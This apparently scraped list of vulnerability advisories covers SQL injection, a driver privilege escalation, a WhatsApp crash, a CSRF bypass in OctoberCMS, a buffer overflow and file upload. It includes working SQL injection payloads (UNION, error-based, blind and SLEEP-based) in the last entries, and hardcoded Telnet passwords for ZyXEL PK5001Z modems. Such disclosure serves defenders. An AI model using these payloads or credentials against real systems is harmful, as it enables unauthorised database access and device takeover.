$_POST['tableId'] is not escaped, allowing an attacker to inject arbitrary SQL commands. An attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can result in the manipulation or disclosure of application data.
Vir.IT eXplorer Anti-Virus is vulnerable to an arbitrary write privilege escalation vulnerability. This vulnerability is due to the driver VIAGLT64.SYS not validating user-supplied input before using it to write to an arbitrary memory location. An attacker can exploit this vulnerability by sending a specially crafted IOCTL request to the driver. This can allow an attacker to execute arbitrary code with elevated privileges.
WhatsApp 2.17.52 and prior is prone to a remote memory corruption. This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history.
Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF Tokens for postback handling, allowing an attacker to successfully take over the victim's account. The vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring. The researcher found a way to bypass this protection. After digging more in the Application he found a postback variable '_handler=' which could be used to perform CSRF without X-Headers. The CSRF Tokens were also not being validated when _handler parameter was used to make the request.
ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. The modem has a hardcoded admin and root Telnet password which can be used to login via Telnet. The admin username is 'admin' and the password is 'CenturyL1nk'. The root password is 'zyad5001'.
A buffer overflow vulnerability exists in Easy MPEG/AVI/DIVX/WMV/RM to DVD software when a long string is entered in the 'Enter User Name' field. This can be exploited to execute arbitrary code by using a specially crafted string.
The vulnerability allows an student,teacher upload arbitrary file....
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/download/[SQL] VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a). Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/category.php?id=[SQL] 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+- http://localhost/[PATH]/author.php?id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=18 AND 8646=8646 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=18 AND SLEEP(5) Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=27 AND SLEEP(5)
Services By CQR